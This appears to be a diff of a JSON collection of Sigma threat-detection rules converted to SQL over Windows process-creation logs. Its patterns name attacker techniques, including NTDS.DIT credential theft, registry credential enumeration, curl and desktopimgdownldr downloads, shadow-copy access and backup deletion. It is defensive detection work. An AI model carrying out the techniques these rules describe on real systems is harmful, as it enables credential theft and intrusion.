FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%dll,MyStart%' ESCAPE '\\' OR CommandLine LIKE '%dll MyStart%' ESCAPE '\\') OR (CommandLine LIKE '% MyStart' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_recon_product_class.yml" + "filename": "proc_creation_win_apt_taidoor.yml" }, { - "title": "Password Protected Compressed File Extraction Via 7Zip", - "id": "b717b8fd-6467-4d7d-b3d3-27f9a463af77", - "status": "experimental", - "description": "Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote Access Tool - ScreenConnect Suspicious Execution", + "id": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "status": "test", + "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ - "Legitimate activity is expected since extracting files with a password can be common in some environement." + "Legitimate use by administrative staff" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7zr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '% -p%' ESCAPE '\\' AND CommandLine LIKE '% x %' ESCAPE '\\' AND CommandLine LIKE '% -o%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%e=Access&%' ESCAPE '\\' AND CommandLine LIKE '%y=Guest&%' ESCAPE '\\' AND CommandLine LIKE '%&p=%' ESCAPE '\\' AND CommandLine LIKE '%&c=%' ESCAPE '\\' AND CommandLine LIKE '%&k=%' ESCAPE '\\')" ], - "filename": "proc_creation_win_7zip_password_extraction.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect_access.yml" }, { - "title": "Monitoring Winget For LOLbin Execution", - "id": "313d6012-51a0-4d93-8dfc-de8553239e25", - "status": "experimental", - "description": "Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them without touching disk. The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe's, msi, msix files later.", - "author": "Sreeman, Florian Roth (Nextron Systems), Frack113", + "title": "Invoke-Obfuscation STDIN+ Launcher", + "id": "6c96fc76-0eb1-11eb-adc1-0242ac120002", + "status": "test", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1059" - ], - "falsepositives": [ - "Admin activity installing packages not in the official Microsoft repo. Winget probably won't be used by most users." - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND CommandLine LIKE '%install%' ESCAPE '\\' AND (CommandLine LIKE '%-m %' ESCAPE '\\' OR CommandLine LIKE '%--manifest%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_lolbin_execution_via_winget.yml" - }, - { - "title": "Enumeration for Credentials in Registry", - "id": "e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1", - "status": "test", - "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials.\nThe Windows Registry stores configuration information that can be used by the system or other programs.\nAdversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services\n", - "author": "frack113", - "tags": [ - "attack.credential_access", - "attack.t1552.002" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '% query %' ESCAPE '\\' AND CommandLine LIKE '%/t %' ESCAPE '\\' AND CommandLine LIKE '%REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/s%' ESCAPE '\\') AND ((CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%HKLM%' ESCAPE '\\') OR (CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%HKCU%' ESCAPE '\\') OR CommandLine LIKE '%HKCU\\\\Software\\\\SimonTatham\\\\PuTTY\\\\Sessions%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (CommandLine LIKE '%noexit%' ESCAPE '\\' OR (CommandLine LIKE '%input%' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_enumeration_for_credentials_in_registry.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_stdin.yml" }, { - "title": "Suspicious Curl.EXE Download", - "id": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", + "title": "Suspicious Process Patterns NTDS.DIT Exfil", + "id": "8bc64091-6875-4881-aaf9-7bd25b5dda08", "status": "experimental", - "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND ((CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\' OR CommandLine LIKE '%.vbe' ESCAPE '\\' OR CommandLine LIKE '%.vbs' ESCAPE '\\'))) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--silent --show-error --output %' ESCAPE '\\' AND CommandLine LIKE '%gfw-httpget-%' ESCAPE '\\' AND CommandLine LIKE '%AppData%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\NTDSDump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NTDSDumpEx.exe' ESCAPE '\\') OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND CommandLine LIKE '%system.hiv%' ESCAPE '\\') OR CommandLine LIKE '%NTDSgrab.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%ac i ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%/c copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\') OR (CommandLine LIKE '%activate instance ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%ntds.dit%' ESCAPE '\\')) OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND ((ParentProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_curl_susp_download.yml" + "filename": "proc_creation_win_susp_ntds.yml" }, { - "title": "Pubprn.vbs Proxy Execution", - "id": "1fb76ab8-fa60-4b01-bddd-71e89bf555da", + "title": "Suspicious Group And Account Reconnaissance Activity Using Net.EXE", + "id": "d95de845-b83c-4a9a-8a6a-4fc802ebf6c0", "status": "experimental", - "description": "Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.", - "author": "frack113", + "description": "Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE", + "author": "Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1216.001" + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002" ], "falsepositives": [ - "Unknown" + "Inventory tool runs", + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\pubprn.vbs%' ESCAPE '\\' AND CommandLine LIKE '%script:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND ((((CommandLine LIKE '% group %' ESCAPE '\\' OR CommandLine LIKE '% localgroup %' ESCAPE '\\') AND (CommandLine LIKE '%domain admins%' ESCAPE '\\' OR CommandLine LIKE '% administrator%' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\' OR CommandLine LIKE '%enterprise admins%' ESCAPE '\\' OR CommandLine LIKE '%Exchange Trusted Subsystem%' ESCAPE '\\' OR CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\' OR CommandLine LIKE '% /do%' ESCAPE '\\')) AND NOT (CommandLine LIKE '% /add%' ESCAPE '\\')) OR (CommandLine LIKE '% accounts %' ESCAPE '\\' AND CommandLine LIKE '% /do%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_pubprn.yml" + "filename": "proc_creation_win_net_groups_and_accounts_recon.yml" }, { - "title": "Add New Windows Capability - ProcCreation", - "id": "b36d01a3-ddaf-4804-be18-18a6247adfcd", + "title": "Suspicious PowerShell Child Processes", + "id": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", "status": "experimental", - "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add new windows capabilities. Notable capabilities could be \"OpenSSH\" and others.", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.execution" - ], + "description": "Detects suspicious child processes spawned by PowerShell", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "falsepositives": [ - "Legitimate usage of the capabilities by administartors or users. Filter accordingly" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-WindowsCapability%' ESCAPE '\\' AND CommandLine LIKE '%OpenSSH.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_add_windows_capability.yml" + "filename": "proc_creation_win_powershell_susp_child_processes.yml" }, { - "title": "Disabled IE Security Features", - "id": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", + "title": "Fake Instance Of Hxtsr.exe", + "id": "4e762605-34a8-406d-b72e-c1a089313320", "status": "test", - "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", - "author": "Florian Roth (Nextron Systems)", + "description": "HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.\nHxTsr.exe is part of Outlook apps, because it resides in a hidden \"WindowsApps\" subfolder of \"C:\\Program Files\".\nIts path includes a version number, e.g., \"C:\\Program Files\\WindowsApps\\microsoft.windowscommunicationsapps_17.7466.41167.0_x64__8wekyb3d8bbwe\\HxTsr.exe\".\nAny instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe\n", + "author": "Sreeman", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1036" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% -name IEHarden %' ESCAPE '\\' AND CommandLine LIKE '% -value 0 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DEPOff %' ESCAPE '\\' AND CommandLine LIKE '% -value 1 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DisableFirstRunCustomize %' ESCAPE '\\' AND CommandLine LIKE '% -value 2 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName = 'hxtsr.exe' AND NOT (CurrentDirectory LIKE 'C:\\\\program files\\\\windowsapps\\\\microsoft.windowscommunicationsapps\\_%' ESCAPE '\\' AND CurrentDirectory LIKE '%\\\\hxtsr.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_disable_ie_features.yml" + "filename": "proc_creation_win_hxtsr_masquerading.yml" }, { - "title": "MERCURY APT Activity", - "id": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", + "title": "Remote File Download via Desktopimgdownldr Utility", + "id": "214641c2-c579-4ecb-8427-0cf19df6842e", "status": "experimental", - "description": "Detects suspicious command line patterns seen being used by MERCURY APT", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.", + "author": "Tim Rauch", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.g0069" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-exec bypass -w 1 -enc%' ESCAPE '\\' AND CommandLine LIKE '%UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\desktopimgdownldr.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\desktopimgdownldr.exe' ESCAPE '\\' AND CommandLine LIKE '%/lockscreenurl:http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_mercury.yml" + "filename": "proc_creation_win_desktopimgdownldr_remote_file_download.yml" }, { - "title": "AADInternals PowerShell Cmdlets Execution - ProccessCreation", - "id": "c86500e9-a645-4680-98d7-f882c70c1ea3", + "title": "HackTool - SysmonEOP Execution", + "id": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", "status": "experimental", - "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", - "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.reconnaissance", - "attack.discovery", - "attack.credential_access", - "attack.impact" + "cve.2022.41120", + "attack.t1068", + "attack.privilege_escalation" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Disable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Enable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Export-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Get-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Grant-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Install-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Join-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%New-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Open-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Read-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Register-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Remove-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Restore-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Search-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Send-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Set-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Start-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Update-AADInt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SysmonEOP.exe' ESCAPE '\\' OR Hashes IN ('IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5', 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC') OR Imphash IN ('22f4089eb8aba31e1bb162c6d9bf72e5', '5123fa4c4384d431cd0d893eeb49bbec')))" ], - "filename": "proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" + "filename": "proc_creation_win_hktl_sysmoneop.yml" }, { - "title": "HackTool - SILENTTRINITY Stager Execution", - "id": "03552375-cc2c-4883-bbe4-7958d5a980be", - "status": "test", - "description": "Detects SILENTTRINITY stager use via PE metadata", - "author": "Aleksey Potapov, oscd.community", + "title": "Potential Dtrack RAT Activity", + "id": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", + "status": "stable", + "description": "Detects potential Dtrack RAT activity via specific process patterns", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1071" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Description LIKE '%st2stager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ping -n %' ESCAPE '\\' AND CommandLine LIKE '% echo EEEE > %' ESCAPE '\\') OR (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\res.ip%' ESCAPE '\\') OR (CommandLine LIKE '%interface ip show config%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\netsh.res%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_silenttrinity_stager.yml" + "filename": "proc_creation_win_malware_dtrack.yml" }, { - "title": "Suspicious Usage Of ShellExec_RunDLL", - "id": "d87bd452-6da1-456e-8155-7dc988157b7d", + "title": "Suspicious Powercfg Execution To Change Lock Screen Timeout", + "id": "f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b", "status": "experimental", - "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout", + "author": "frack113", "tags": [ "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%odbcconf%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%iex%' ESCAPE '\\' OR CommandLine LIKE '%comspec%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\powercfg.exe' ESCAPE '\\' OR OriginalFileName = 'PowerCfg.exe') AND ((CommandLine LIKE '%/setacvalueindex %' ESCAPE '\\' AND CommandLine LIKE '%SCHEME\\_CURRENT%' ESCAPE '\\' AND CommandLine LIKE '%SUB\\_VIDEO%' ESCAPE '\\' AND CommandLine LIKE '%VIDEOCONLOCK%' ESCAPE '\\') OR (CommandLine LIKE '%-change %' ESCAPE '\\' AND CommandLine LIKE '%-standby-timeout-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_susp_shellexec_execution.yml" + "filename": "proc_creation_win_powercfg_execution.yml" }, { - "title": "Potential File Overwrite Via Sysinternals SDelete", - "id": "a4824fca-976f-4964-b334-0621379e84c4", + "title": "Copy From VolumeShadowCopy Via Cmd.EXE", + "id": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", "status": "experimental", - "description": "Detects the use of SDelete to erase a file not the free space", - "author": "frack113", + "description": "Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives that are in use)", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ "attack.impact", - "attack.t1485" + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Backup scenarios using the commandline" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'sdelete.exe' AND NOT ((CommandLine LIKE '% -h%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% -z%' ESCAPE '\\' OR CommandLine LIKE '% /\\?%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_sdelete.yml" + "filename": "proc_creation_win_cmd_shadowcopy_access.yml" }, { - "title": "PUA - Advanced Port Scanner Execution", - "id": "54773c5f-f1cc-4703-9126-2f797d96a69d", + "title": "Suspicious Schtasks Execution AppData Folder", + "id": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", "status": "experimental", - "description": "Detects the use of Advanced Port Scanner.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", + "author": "pH-T (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.discovery", - "attack.t1046", - "attack.t1135" + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrative use", - "Tools with similar commandline (very rare)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\advanced\\_port\\_scanner%' ESCAPE '\\' OR OriginalFileName LIKE '%advanced\\_port\\_scanner%' ESCAPE '\\' OR Description LIKE '%Advanced Port Scanner%' ESCAPE '\\') OR (CommandLine LIKE '%/portable%' ESCAPE '\\' AND CommandLine LIKE '%/lng%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/TR%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_advanced_port_scanner.yml" + "filename": "proc_creation_win_schtasks_appdata_local_system.yml" }, { - "title": "SystemStateBackup Deleted Using Wbadmin.EXE", - "id": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", + "title": "Suspicious WmiPrvSE Child Process", + "id": "8a582fe2-0882-4b89-a82a-da6b2dc32937", "status": "test", - "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", - "author": "frack113", + "description": "Detects suspicious and uncommon child processes of WmiPrvSE", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.execution", + "attack.defense_evasion", + "attack.t1047", + "attack.t1204.002", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete %' ESCAPE '\\' AND CommandLine LIKE '%systemstatebackup %' ESCAPE '\\' AND CommandLine LIKE 